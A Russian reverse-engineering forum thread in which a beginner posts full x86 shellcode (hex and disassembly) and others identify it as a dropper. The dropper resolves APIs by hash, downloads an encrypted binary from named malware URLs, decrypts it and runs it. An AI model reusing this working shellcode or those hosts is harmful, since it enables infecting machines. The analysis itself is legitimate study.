Ассемблер только начал изучать. Мнемонических команд знаю пока не много, поэтому прошу разказать что делает этот код(возможно это бесмыслица, код преобразовал из вида 0х**\...): Код (Text): 0x00000000 0x00000000 0x64,0xa1,0x18,0x00, mov eax,dword ptr [0x18] 0x00000006 0x00000006 0x8b,0x40,0x30 mov eax,dword ptr [eax+0x30] 0x00000009 0x00000009 0x8b,0x40,0x54 mov eax,dword ptr [eax+0x54] 0x0000000c 0x0000000c 0x8b,0x40,0x04 mov eax,dword ptr [eax+0x4] 0x0000000f 0x0000000f 0x8b,0x40,0x04 mov eax,dword ptr [eax+0x4] 0x00000012 0x00000012 0x8b,0x40,0x04 mov eax,dword ptr [eax+0x4] 0x00000015 0x00000015 0x0d,0x20,0x00,0x20, or eax,0x200020 0x0000001a 0x0000001a 0x3d,0x7c,0x00,0x77, cmp eax,0x77007c 0x0000001f 0x0000001f 0x74,0x01 jz 0x22 0x00000021 0x00000021 0xc3 ret eip,esp 0x00000022 0x00000022 0x33,0xc0 xor eax,eax 0x00000024 0x00000024 0x64,0x8b,0x40,0x30 mov eax,dword ptr [eax+0x30] 0x00000028 0x00000028 0x78,0x0c js 0x36 0x0000002a 0x0000002a 0x8b,0x40,0x0c mov eax,dword ptr [eax+0xc] 0x0000002d 0x0000002d 0x8b,0x70,0x1c mov esi,dword ptr [eax+0x1c] 0x00000030 0x00000030 0xad lodsd eax,dword ptr ds:[esi] 0x00000031 0x00000031 0x8b,0x58,0x08 mov ebx,dword ptr [eax+0x8] 0x00000034 0x00000034 0xeb,0x09 jmp 0x3f 0x00000036 0x00000036 0x8b,0x40,0x34 mov eax,dword ptr [eax+0x34] 0x00000039 0x00000039 0x8d,0x40,0x7c lea eax,dword ptr [eax+0x7c] 0x0000003c 0x0000003c 0x8b,0x58,0x3c mov ebx,dword ptr [eax+0x3c] 0x0000003f 0x0000003f 0x6a,0x4e push 0x4e esp 0x00000041 0x00000041 0x5a pop edx esp 0x00000042 0x00000042 0xd1,0xe2 shl edx,0x1 0x00000044 0x00000044 0x2b,0xe2 sub esp,edx 0x00000046 0x00000046 0x8b,0xec mov ebp,esp 0x00000048 0x00000048 0xc7,0x45,0x10,0x6e, mov dword ptr [ebp+0x10],0x7865 0x0000004f 0x0000004f 0xc7,0x45,0x14,0xff, mov dword ptr [ebp+0x14],0x1ff 0x00000056 0x00000056 0xc7,0x45,0x00,0x00, mov dword ptr [ebp],0x0 0x0000005d 0x0000005d 0xeb,0x4f jmp 0xae 0x0000005f 0x0000005f 0x5a pop edx esp 0x00000060 0x00000060 0x52 push edx esp 0x00000061 0x00000061 0x83,0xea,0x56 sub edx,0x56 0x00000064 0x00000064 0x89,0x55,0x18 mov dword ptr [ebp+0x18],edx 0x00000067 0x00000067 0x56 push esi esp 0x00000068 0x00000068 0x57 push edi esp 0x00000069 0x00000069 0x8b,0x73,0x3c mov esi,dword ptr [ebx+0x3c] 0x0000006c 0x0000006c 0x8b,0x74,0x33,0x78 mov esi,dword ptr [ebx+esi+0x78 0x00000070 0x00000070 0x03,0xf3 add esi,ebx 0x00000072 0x00000072 0x56 push esi esp 0x00000073 0x00000073 0x8b,0x76,0x20 mov esi,dword ptr [esi+0x20] 0x00000076 0x00000076 0x03,0xf3 add esi,ebx 0x00000078 0x00000078 0x33,0xc9 xor ecx,ecx 0x0000007a 0x0000007a 0x49 dec ecx 0x0000007b 0x0000007b 0x50 push eax esp 0x0000007c 0x0000007c 0x41 inc ecx 0x0000007d 0x0000007d 0xad lodsd eax,dword ptr ds:[esi] 0x0000007e 0x0000007e 0x33,0xff xor edi,edi 0x00000080 0x00000080 0x36,0x0f,0xbe,0x14, movsx edx,byte ptr [ebx+eax] 0x00000085 0x00000085 0x38,0xf2 cmp dl,dh 0x00000087 0x00000087 0x74,0x08 jz 0x91 0x00000089 0x00000089 0xc1,0xcf,0x0d ror edi,0xd 0x0000008c 0x0000008c 0x03,0xfa add edi,edx 0x0000008e 0x0000008e 0x40 inc eax 0x0000008f 0x0000008f 0xeb,0xef jmp 0x80 0x00000091 0x00000091 0x58 pop eax esp 0x00000092 0x00000092 0x3b,0xf8 cmp edi,eax 0x00000094 0x00000094 0x75,0xe5 jnz 0x7b 0x00000096 0x00000096 0x5e pop esi esp 0x00000097 0x00000097 0x8b,0x46,0x24 mov eax,dword ptr [esi+0x24] 0x0000009a 0x0000009a 0x03,0xc3 add eax,ebx 0x0000009c 0x0000009c 0x66,0x8b,0x0c,0x48 mov cx,word ptr [eax+ecx*2] 0x000000a0 0x000000a0 0x8b,0x56,0x1c mov edx,dword ptr [esi+0x1c] 0x000000a3 0x000000a3 0x03,0xd3 add edx,ebx 0x000000a5 0x000000a5 0x8b,0x04,0x8a mov eax,dword ptr [edx+ecx*4] 0x000000a8 0x000000a8 0x03,0xc3 add eax,ebx 0x000000aa 0x000000aa 0x5f pop edi esp 0x000000ab 0x000000ab 0x5e pop esi esp 0x000000ac 0x000000ac 0x50 push eax esp 0x000000ad 0x000000ad 0xc3 ret eip,esp 0x000000ae 0x000000ae 0x8d,0x7d,0x1c lea edi,dword ptr [ebp+0x1c] 0x000000b1 0x000000b1 0x57 push edi esp 0x000000b2 0x000000b2 0x52 push edx esp 0x000000b3 0x000000b3 0xb8,0x33,0xca,0x8a, mov eax,0x5b8aca33 0x000000b8 0x000000b8 0xe8,0xa2,0xff,0xff, call 0x5f eip,esp 0x000000bd 0x000000bd 0x32,0xc0 xor al,al 0x000000bf 0x000000bf 0x8b,0xf7 mov esi,edi 0x000000c1 0x000000c1 0xf2,0xae scasb al,byte ptr es:[edi] 0x000000c3 0x000000c3 0x4f dec edi 0x000000c4 0x000000c4 0x8b,0x45,0x10 mov eax,dword ptr [ebp+0x10] 0x000000c7 0x000000c7 0xab stosd dword ptr es:[edi],eax 0x000000c8 0x000000c8 0x66,0x98 cwde ax,eax 0x000000ca 0x000000ca 0x66,0xab stosd word ptr es:[edi],ax 0x000000cc 0x000000cc 0x33,0xc0 xor eax,eax 0x000000ce 0x000000ce 0xb8,0x61,0x64,0x00, mov eax,0x6461 0x000000d3 0x000000d3 0x50 push eax esp 0x000000d4 0x000000d4 0x68,0x54,0x68,0x72, push 0x65726854 esp 0x000000d9 0x000000d9 0x35,0x24,0x1c,0x69, xor eax,0x74691c24 0x000000de 0x000000de 0x50 push eax esp 0x000000df 0x000000df 0x54 push esp esp 0x000000e0 0x000000e0 0x53 push ebx esp 0x000000e1 0x000000e1 0xb8,0xaa,0xfc,0x0d, mov eax,0x7c0dfcaa 0x000000e6 0x000000e6 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x000000e9 0x000000e9 0x83,0xc4,0x0c add esp,0xc 0x000000ec 0x000000ec 0x50 push eax esp 0x000000ed 0x000000ed 0xb0,0x6c mov al,0x6c 0x000000ef 0x000000ef 0x8a,0xe0 mov ah,al 0x000000f1 0x000000f1 0x98 cwde ax,eax 0x000000f2 0x000000f2 0x50 push eax esp 0x000000f3 0x000000f3 0x68,0x6f,0x6e,0x2e, push 0x642e6e6f esp 0x000000f8 0x000000f8 0x68,0x75,0x72,0x6c, push 0x6d6c7275 esp 0x000000fd 0x000000fd 0x54 push esp esp 0x000000fe 0x000000fe 0xb8,0x8e,0x4e,0x0e, mov eax,0xec0e4e8e 0x00000103 0x00000103 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x00000106 0x00000106 0x83,0xc4,0x0c add esp,0xc 0x00000109 0x00000109 0x93 xchg eax,ebx 0x0000010a 0x0000010a 0x50 push eax esp 0x0000010b 0x0000010b 0x33,0xc0 xor eax,eax 0x0000010d 0x0000010d 0x50 push eax esp 0x0000010e 0x0000010e 0x50 push eax esp 0x0000010f 0x0000010f 0x56 push esi esp 0x00000110 0x00000110 0x8b,0x55,0x18 mov edx,dword ptr [ebp+0x18] 0x00000113 0x00000113 0x03,0x55,0x14 add edx,dword ptr [ebp+0x14] 0x00000116 0x00000116 0x52 push edx esp 0x00000117 0x00000117 0x50 push eax esp 0x00000118 0x00000118 0xb8,0x36,0x1a,0x2f, mov eax,0x702f1a36 0x0000011d 0x0000011d 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x00000120 0x00000120 0x5b pop ebx esp 0x00000121 0x00000121 0x83,0x7d,0x00,0x01 cmp dword ptr [ebp],0x1 0x00000125 0x00000125 0x0f,0x85,0x9e,0x00, jnz 0x1c9 0x0000012b 0x0000012b 0x6a,0x00 push 0x0 esp 0x0000012d 0x0000012d 0x68,0x80,0x00,0x00, push 0x80 esp 0x00000132 0x00000132 0x6a,0x03 push 0x3 esp 0x00000134 0x00000134 0x6a,0x00 push 0x0 esp 0x00000136 0x00000136 0x6a,0x03 push 0x3 esp 0x00000138 0x00000138 0x68,0x00,0x00,0x00, push 0xc0000000 esp 0x0000013d 0x0000013d 0x56 push esi esp 0x0000013e 0x0000013e 0xb8,0xa5,0x17,0x00, mov eax,0x7c0017a5 0x00000143 0x00000143 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x00000146 0x00000146 0x89,0x45,0x04 mov dword ptr [ebp+0x4],eax 0x00000149 0x00000149 0x6a,0x04 push 0x4 esp 0x0000014b 0x0000014b 0x68,0x00,0x10,0x00, push 0x1000 esp 0x00000150 0x00000150 0x68,0x00,0x00,0x08, push 0x80000 esp 0x00000155 0x00000155 0x6a,0x00 push 0x0 esp 0x00000157 0x00000157 0xb8,0x54,0xca,0xaf, mov eax,0x91afca54 0x0000015c 0x0000015c 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x0000015f 0x0000015f 0x89,0x45,0x0c mov dword ptr [ebp+0xc],eax 0x00000162 0x00000162 0x50 push eax esp 0x00000163 0x00000163 0x6a,0x00 push 0x0 esp 0x00000165 0x00000165 0x8d,0x4d,0x08 lea ecx,dword ptr [ebp+0x8] 0x00000168 0x00000168 0x51 push ecx esp 0x00000169 0x00000169 0x68,0x00,0x00,0x08, push 0x80000 esp 0x0000016e 0x0000016e 0x50 push eax esp 0x0000016f 0x0000016f 0xff,0x75,0x04 push dword ptr [ebp+0x4] esp 0x00000172 0x00000172 0xb8,0x16,0x65,0xfa, mov eax,0x10fa6516 0x00000177 0x00000177 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x0000017a 0x0000017a 0x5f pop edi esp 0x0000017b 0x0000017b 0x8b,0x17 mov edx,dword ptr [edi] 0x0000017d 0x0000017d 0x83,0xc7,0x04 add edi,0x4 0x00000180 0x00000180 0x8b,0x4d,0x08 mov ecx,dword ptr [ebp+0x8] 0x00000183 0x00000183 0x83,0xe9,0x04 sub ecx,0x4 0x00000186 0x00000186 0xe8,0xa7,0x00,0x00, call 0x232 eip,esp 0x0000018b 0x0000018b 0x6a,0x00 push 0x0 esp 0x0000018d 0x0000018d 0x6a,0x00 push 0x0 esp 0x0000018f 0x0000018f 0x6a,0x00 push 0x0 esp 0x00000191 0x00000191 0xff,0x75,0x04 push dword ptr [ebp+0x4] esp 0x00000194 0x00000194 0xb8,0xac,0x08,0xda, mov eax,0x76da08ac 0x00000199 0x00000199 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x0000019c 0x0000019c 0x6a,0x00 push 0x0 esp 0x0000019e 0x0000019e 0x8d,0x4d,0x08 lea ecx,dword ptr [ebp+0x8] 0x000001a1 0x000001a1 0x51 push ecx esp 0x000001a2 0x000001a2 0xff,0x75,0x08 push dword ptr [ebp+0x8] esp 0x000001a5 0x000001a5 0xff,0x75,0x0c push dword ptr [ebp+0xc] esp 0x000001a8 0x000001a8 0x83,0x04,0x24,0x04 add dword ptr [esp],0x4 0x000001ac 0x000001ac 0xff,0x75,0x04 push dword ptr [ebp+0x4] esp 0x000001af 0x000001af 0xb8,0x1f,0x79,0x0a, mov eax,0xe80a791f 0x000001b4 0x000001b4 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x000001b7 0x000001b7 0xff,0x75,0x04 push dword ptr [ebp+0x4] esp 0x000001ba 0x000001ba 0xb8,0xfb,0x97,0xfd, mov eax,0xffd97fb 0x000001bf 0x000001bf 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x000001c2 0x000001c2 0xc7,0x45,0x00,0x02, mov dword ptr [ebp],0x2 0x000001c9 0x000001c9 0x57 push edi esp 0x000001ca 0x000001ca 0x56 push esi esp 0x000001cb 0x000001cb 0xb8,0x98,0xfe,0x8a, mov eax,0xe8afe98 0x000001d0 0x000001d0 0xff,0x55,0x18 call dword ptr [ebp+0x18] eip,esp 0x000001d3 0x000001d3 0xeb,0x2a jmp 0x1ff 0x000001d5 0x000001d5 0x18,0x2a sbb byte ptr [edx],ch 0x000001d7 0x000001d7 0xf9 stc 0x000001d8 0x000001d8 0xb7,0xd2 mov bh,0xd2 0x000001da 0x000001da 0x77,0xb3 ja 0x18f 0x000001dc 0x000001dc 0x01,0x45,0x8a add dword ptr [ebp-0x76],eax 0x000001df 0x000001df 0x92 xchg eax,edx 0x000001e0 0x000001e0 0xb7,0xad mov bh,0xad 0x000001e2 0x000001e2 0x50 push eax esp 0x000001e3 0x000001e3 0x5d pop ebp esp 0x000001e4 0x000001e4 0xe4,0x67 in al,0x67 0x000001e6 0x000001e6 0xf5 cmc 0x000001e7 0x000001e7 0xe6,0xc7 out 0xc7,al 0x000001e9 0x000001e9 0x1a,0xbf,0xab,0x1e, sbb bh,byte ptr [edi+0x42101eab 0x000001ef 0x000001ef 0x76,0xa2 jbe 0x193 0x000001f1 0x000001f1 0xa1,0x54,0x63,0x09, mov eax,dword ptr [0x7b096354] 0x000001f6 0x000001f6 0x89,0xb0,0xf4,0x97, mov dword ptr [eax+0x734e97f4], 0x000001fc 0x000001fc 0x93 xchg eax,ebx 0x000001fd 0x000001fd 0x3f aas 0x000001fe 0x000001fe 0xf1 0x000001ff 0x000001ff 0x83,0x7d,0x00,0x02 cmp dword ptr [ebp],0x2 0x00000203 0x00000203 0x74,0x60 jz 0x265 0x00000205 0x00000205 0xc7,0x45,0x00,0x01, mov dword ptr [ebp],0x1 0x0000020c 0x0000020c 0xc7,0x45,0x10,0x79, mov dword ptr [ebp+0x10],0x7865 0x00000213 0x00000213 0xc7,0x45,0x14,0x72, mov dword ptr [ebp+0x14],0x172 0x0000021a 0x0000021a 0x8b,0x7d,0x18 mov edi,dword ptr [ebp+0x18] 0x0000021d 0x0000021d 0x03,0x7d,0x14 add edi,dword ptr [ebp+0x14] 0x00000220 0x00000220 0xb9,0x26,0x00,0x00, mov ecx,0x26 0x00000225 0x00000225 0x8b,0x57,0xfc mov edx,dword ptr [edi-0x4] 0x00000228 0x00000228 0xe8,0x05,0x00,0x00, call 0x232 eip,esp 0x0000022d 0x0000022d 0xe9,0x7c,0xfe,0xff, jmp 0xae 0x00000232 0x00000232 0x33,0xc0 xor eax,eax 0x00000234 0x00000234 0x8a,0x07 mov al,byte ptr [edi] 0x00000236 0x00000236 0xd2,0xc8 ror al,cl 0x00000238 0x00000238 0x32,0xc1 xor al,cl 0x0000023a 0x0000023a 0xf6,0xd0 not al 0x0000023c 0x0000023c 0x32,0xc5 xor al,ch 0x0000023e 0x0000023e 0x32,0xc2 xor al,dl 0x00000240 0x00000240 0x32,0xc6 xor al,dh 0x00000242 0x00000242 0xd2,0xc0 rol al,cl 0x00000244 0x00000244 0x02,0xc1 add al,cl 0x00000246 0x00000246 0x02,0xc5 add al,ch 0x00000248 0x00000248 0x02,0xc2 add al,dl 0x0000024a 0x0000024a 0x02,0xc6 add al,dh 0x0000024c 0x0000024c 0xd2,0xc8 ror al,cl 0x0000024e 0x0000024e 0x2a,0xc1 sub al,cl 0x00000250 0x00000250 0x2a,0xc5 sub al,ch 0x00000252 0x00000252 0xf6,0xd0 not al 0x00000254 0x00000254 0x2a,0xc2 sub al,dl 0x00000256 0x00000256 0x2a,0xc6 sub al,dh 0x00000258 0x00000258 0xd2,0xc0 rol al,cl 0x0000025a 0x0000025a 0xd3,0xc2 rol edx,cl 0x0000025c 0x0000025c 0x0f,0xca bswap edx 0x0000025e 0x0000025e 0x88,0x07 mov byte ptr [edi],al 0x00000260 0x00000260 0x47 inc edi 0x00000261 0x00000261 0x49 dec ecx 0x00000262 0x00000262 0x75,0xce jnz 0x232 0x00000264 0x00000264 0xc3 ret eip,esp 0x00000265 0x00000265 0xc3 ret eip,esp
если уж начинать реверсить то первым делом определить начальную точку(entry point) как правило она указана в заголовке exe файла возьмите для начала прогу попроще которая точно не запакована а то будете первые несколько лет изучать распаковщик
и если уж совем начинающий то для начала соберите стандартную привет мир которая написана на каждом углу
TbI_TyT возьми какойнить который мусор пытается анализировать- hiew помнится тоже перлы выдавал на мусоре
http://www.hhdsoftware.com/Downloads/hex-editor-ultimate.html С помощью каких средств можно получить правильную\корректную и читабельную мнемонику из этого кода?: Код (Text): "\x64\xA1\x18\x00\x00\x00\x8B\x40\x30\x8B\x40\x54\x8B\x40\x04\x8B". "\x40\x04\x8B\x40\x04\x0D\x20\x00\x20\x00\x3D\x7C\x00\x77\x00\x74". "\x01\xC3\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C". "\xAD\x8B\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A". "\x4E\x5A\xD1\xE2\x2B\xE2\x8B\xEC\xC7\x45\x10\x6E\x2E\x65\x78\xC7". "\x45\x14\xFF\x01\x00\x00\xC7\x45\x00\x00\x00\x00\x00\xEB\x4F\x5A". "\x52\x83\xEA\x56\x89\x55\x18\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78". "\x03\xF3\x56\x8B\x76\x20\x03\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF". "\x36\x0F\xBE\x14\x03\x38\xF2\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB". "\xEF\x58\x3B\xF8\x75\xE5\x5E\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48". "\x8B\x56\x1C\x03\xD3\x8B\x04\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D". "\x1C\x57\x52\xB8\x33\xCA\x8A\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B". "\xF7\xF2\xAE\x4F\x8B\x45\x10\xAB\x66\x98\x66\xAB\x33\xC0\xB8\x61". "\x64\x00\x00\x50\x68\x54\x68\x72\x65\x35\x24\x1C\x69\x74\x50\x54". "\x53\xB8\xAA\xFC\x0D\x7C\xFF\x55\x18\x83\xC4\x0C\x50\xB0\x6C\x8A". "\xE0\x98\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E". "\x4E\x0E\xEC\xFF\x55\x18\x83\xC4\x0C\x93\x50\x33\xC0\x50\x50\x56". "\x8B\x55\x18\x03\x55\x14\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x18". "\x5B\x83\x7D\x00\x01\x0F\x85\x9E\x00\x00\x00\x6A\x00\x68\x80\x00". "\x00\x00\x6A\x03\x6A\x00\x6A\x03\x68\x00\x00\x00\xC0\x56\xB8\xA5". "\x17\x00\x7C\xFF\x55\x18\x89\x45\x04\x6A\x04\x68\x00\x10\x00\x00". "\x68\x00\x00\x08\x00\x6A\x00\xB8\x54\xCA\xAF\x91\xFF\x55\x18\x89". "\x45\x0C\x50\x6A\x00\x8D\x4D\x08\x51\x68\x00\x00\x08\x00\x50\xFF". "\x75\x04\xB8\x16\x65\xFA\x10\xFF\x55\x18\x5F\x8B\x17\x83\xC7\x04". "\x8B\x4D\x08\x83\xE9\x04\xE8\xA7\x00\x00\x00\x6A\x00\x6A\x00\x6A". "\x00\xFF\x75\x04\xB8\xAC\x08\xDA\x76\xFF\x55\x18\x6A\x00\x8D\x4D". "\x08\x51\xFF\x75\x08\xFF\x75\x0C\x83\x04\x24\x04\xFF\x75\x04\xB8". "\x1F\x79\x0A\xE8\xFF\x55\x18\xFF\x75\x04\xB8\xFB\x97\xFD\x0F\xFF". "\x55\x18\xC7\x45\x00\x02\x00\x00\x00\x57\x56\xB8\x98\xFE\x8A\x0E". "\xFF\x55\x18\xEB\x2A\x18\x2A\xF9\xB7\xD2\x77\xB3\x01\x45\x8A\x92". "\xB7\xAD\x50\x5D\xE4\x67\xF5\xE6\xC7\x1A\xBF\xAB\x1E\x10\x42\x76". "\xA2\xA1\x54\x63\x09\x7B\x89\xB0\xF4\x97\x4E\x73\x93\x3F\xF1\x83". "\x7D\x00\x02\x74\x60\xC7\x45\x00\x01\x00\x00\x00\xC7\x45\x10\x79". "\x2E\x65\x78\xC7\x45\x14\x72\x01\x00\x00\x8B\x7D\x18\x03\x7D\x14". "\xB9\x26\x00\x00\x00\x8B\x57\xFC\xE8\x05\x00\x00\x00\xE9\x7C\xFE". "\xFF\xFF\x33\xC0\x8A\x07\xD2\xC8\x32\xC1\xF6\xD0\x32\xC5\x32\xC2". "\x32\xC6\xD2\xC0\x02\xC1\x02\xC5\x02\xC2\x02\xC6\xD2\xC8\x2A\xC1". "\x2A\xC5\xF6\xD0\x2A\xC2\x2A\xC6\xD2\xC0\xD3\xC2\x0F\xCA\x88\x07". "\x47\x49\x75\xCE\xC3\xC3".
Код (Text): <ModuleEntryPoint>: MOV EAX,DWORD PTR FS:[018h] MOV EAX,DWORD PTR DS:[EAX+030h] MOV EAX,DWORD PTR DS:[EAX+054h] MOV EAX,DWORD PTR DS:[EAX+4] MOV EAX,DWORD PTR DS:[EAX+4] MOV EAX,DWORD PTR DS:[EAX+4] OR EAX,0200020h CMP EAX,077007Ch JE @test_00401022 ; test.00401022 RETN @test_00401022: XOR EAX,EAX MOV EAX,DWORD PTR FS:[EAX+030h] JS @test_00401036 ; test.00401036 MOV EAX,DWORD PTR DS:[EAX+0Ch] MOV ESI,DWORD PTR DS:[EAX+01Ch] LODS DWORD PTR DS:[ESI] MOV EBX,DWORD PTR DS:[EAX+8] JMP @test_0040103F ; test.0040103F @test_00401036: MOV EAX,DWORD PTR DS:[EAX+034h] LEA EAX,DWORD PTR DS:[EAX+07Ch] MOV EBX,DWORD PTR DS:[EAX+03Ch] @test_0040103F: PUSH 04Eh POP EDX SHL EDX,1 SUB ESP,EDX MOV EBP,ESP MOV DWORD PTR SS:[EBP+010h],078652E6Eh MOV DWORD PTR SS:[EBP+014h],01FFh MOV DWORD PTR SS:[EBP],0 JMP @test_004010AE ; test.004010AE @test_0040105F: ;<= Procedure Start POP EDX PUSH EDX SUB EDX,056h MOV DWORD PTR SS:[EBP+018h],EDX PUSH ESI PUSH EDI MOV ESI,DWORD PTR DS:[EBX+03Ch] MOV ESI,DWORD PTR DS:[EBX+ESI+078h] ADD ESI,EBX PUSH ESI MOV ESI,DWORD PTR DS:[ESI+020h] ADD ESI,EBX XOR ECX,ECX DEC ECX @test_0040107B: PUSH EAX INC ECX LODS DWORD PTR DS:[ESI] XOR EDI,EDI @test_00401080: MOVSX EDX,BYTE PTR SS:[EBX+EAX] CMP DL,DH JE @test_00401091 ; test.00401091 ROR EDI,0Dh ADD EDI,EDX INC EAX JMP @test_00401080 ; test.00401080 @test_00401091: POP EAX CMP EDI,EAX JNZ @test_0040107B ; test.0040107B POP ESI MOV EAX,DWORD PTR DS:[ESI+024h] ADD EAX,EBX MOV CX,WORD PTR DS:[EAX+ECX*2] MOV EDX,DWORD PTR DS:[ESI+01Ch] ADD EDX,EBX MOV EAX,DWORD PTR DS:[EDX+ECX*4] ADD EAX,EBX POP EDI POP ESI PUSH EAX RETN ;<= Procedure End @test_004010AE: LEA EDI,DWORD PTR SS:[EBP+01Ch] PUSH EDI PUSH EDX MOV EAX,05B8ACA33h CALL @test_0040105F ; test.0040105F XOR AL,AL MOV ESI,EDI REPNE SCAS BYTE PTR ES:[EDI] DEC EDI MOV EAX,DWORD PTR SS:[EBP+010h] STOS DWORD PTR ES:[EDI] CBW STOS WORD PTR ES:[EDI] XOR EAX,EAX MOV EAX,06461h PUSH EAX PUSH 065726854h XOR EAX,074691C24h PUSH EAX PUSH ESP PUSH EBX MOV EAX,07C0DFCAAh CALL DWORD PTR SS:[EBP+018h] ADD ESP,0Ch PUSH EAX MOV AL,06Ch MOV AH,AL CWDE PUSH EAX PUSH 0642E6E6Fh PUSH 06D6C7275h PUSH ESP MOV EAX,0EC0E4E8Eh CALL DWORD PTR SS:[EBP+018h] ADD ESP,0Ch XCHG EAX,EBX PUSH EAX XOR EAX,EAX PUSH EAX PUSH EAX PUSH ESI MOV EDX,DWORD PTR SS:[EBP+018h] ADD EDX,DWORD PTR SS:[EBP+014h] PUSH EDX PUSH EAX MOV EAX,0702F1A36h CALL DWORD PTR SS:[EBP+018h] POP EBX CMP DWORD PTR SS:[EBP],1 JNZ @test_004011C9 ; test.004011C9 PUSH 0 PUSH 080h PUSH 3 PUSH 0 PUSH 3 PUSH 0C0000000h PUSH ESI MOV EAX,07C0017A5h CALL DWORD PTR SS:[EBP+018h] MOV DWORD PTR SS:[EBP+4],EAX PUSH 4 PUSH 01000h PUSH 080000h PUSH 0 MOV EAX,091AFCA54h CALL DWORD PTR SS:[EBP+018h] MOV DWORD PTR SS:[EBP+0Ch],EAX PUSH EAX PUSH 0 LEA ECX,DWORD PTR SS:[EBP+8] PUSH ECX PUSH 080000h PUSH EAX PUSH DWORD PTR SS:[EBP+4] MOV EAX,010FA6516h CALL DWORD PTR SS:[EBP+018h] POP EDI MOV EDX,DWORD PTR DS:[EDI] ADD EDI,4 MOV ECX,DWORD PTR SS:[EBP+8] SUB ECX,4 CALL @test_00401232 ; test.00401232 PUSH 0 PUSH 0 PUSH 0 PUSH DWORD PTR SS:[EBP+4] MOV EAX,076DA08ACh CALL DWORD PTR SS:[EBP+018h] PUSH 0 LEA ECX,DWORD PTR SS:[EBP+8] PUSH ECX PUSH DWORD PTR SS:[EBP+8] PUSH DWORD PTR SS:[EBP+0Ch] ADD DWORD PTR SS:[ESP],4 PUSH DWORD PTR SS:[EBP+4] MOV EAX,0E80A791Fh CALL DWORD PTR SS:[EBP+018h] PUSH DWORD PTR SS:[EBP+4] MOV EAX,0FFD97FBh CALL DWORD PTR SS:[EBP+018h] MOV DWORD PTR SS:[EBP],2 @test_004011C9: PUSH EDI PUSH ESI MOV EAX,0E8AFE98h CALL DWORD PTR SS:[EBP+018h] JMP @test_004011FF ; test.004011FF DB 018h DB 02Ah ; CHAR '*' DB 0F9h DB 0B7h DB 0D2h DB 077h ; CHAR 'w' DB 0B3h DB 01 DB 045h ; CHAR 'E' DB 08Ah DB 092h DB 0B7h DB 0ADh DB 050h ; CHAR 'P' DB 05Dh ; CHAR ']' DB 0E4h DB 067h ; CHAR 'g' DB 0F5h DB 0E6h DB 0C7h DB 01Ah DB 0BFh DB 0ABh DB 01Eh DB 010h DB 042h ; CHAR 'B' DB 076h ; CHAR 'v' DB 0A2h DB 0A1h DB 054h ; CHAR 'T' DB 063h ; CHAR 'c' DB 09 DB 07Bh ; CHAR '{' DB 089h DB 0B0h DB 0F4h DB 097h DB 04Eh ; CHAR 'N' DB 073h ; CHAR 's' XCHG EAX,EBX AAS INT1 @test_004011FF: CMP DWORD PTR SS:[EBP],2 JE @test_00401265 ; test.00401265 MOV DWORD PTR SS:[EBP],1 MOV DWORD PTR SS:[EBP+010h],078652E79h MOV DWORD PTR SS:[EBP+014h],0172h MOV EDI,DWORD PTR SS:[EBP+018h] ADD EDI,DWORD PTR SS:[EBP+014h] MOV ECX,026h MOV EDX,DWORD PTR DS:[EDI-4] CALL @test_00401232 ; test.00401232 JMP @test_004010AE ; test.004010AE @test_00401232: ;<= Procedure Start XOR EAX,EAX MOV AL,BYTE PTR DS:[EDI] ROR AL,CL XOR AL,CL NOT AL XOR AL,CH XOR AL,DL XOR AL,DH ROL AL,CL ADD AL,CL ADD AL,CH ADD AL,DL ADD AL,DH ROR AL,CL SUB AL,CL SUB AL,CH NOT AL SUB AL,DL SUB AL,DH ROL AL,CL ROL EDX,CL BSWAP EDX MOV BYTE PTR DS:[EDI],AL INC EDI DEC ECX JNZ @test_00401232 ; test.00401232 RETN ;<= Procedure End @test_00401265: RETN
drunkboy Это примитивный дроппер, качает криптованный бинарь отсюда h**p://theyaredead.net/last/cache.php, расшифровывает и запускает. Образчик также криптованный, что он делает не смотрел, если нужен в архиве(сигнатура битая, поправить).
кто-то говорит что качает отсюда: http://vbotnete.ru:10283/upload/download.p...76f5ff5332c59ed http://clicksurfcash.net/ftp/ftp.exe Что такое "образчик"?
drunkboy Дамп начиная с "DB 018h" это шифрованный путь, расшифрованный я привёл, что кто думает без разницы. Это моя точка зрения на то, что скачивается и запускается. Можите рассматривать это как взгляд авера на модуль
В Загрузи OllyDbg. Открой в нем любое приложения. Дождись загрузак dll. Ну а топом в произвольном характере перебей память своим shell'ом. Ты увидиш вызовы функции если они имеются(хотя судя со всего идет вызов каких то классов) И может быть то поймеш откуда тебе отталкиватся. Ну или тестовое приложения с shellcode я думаю проблемы не возникнет....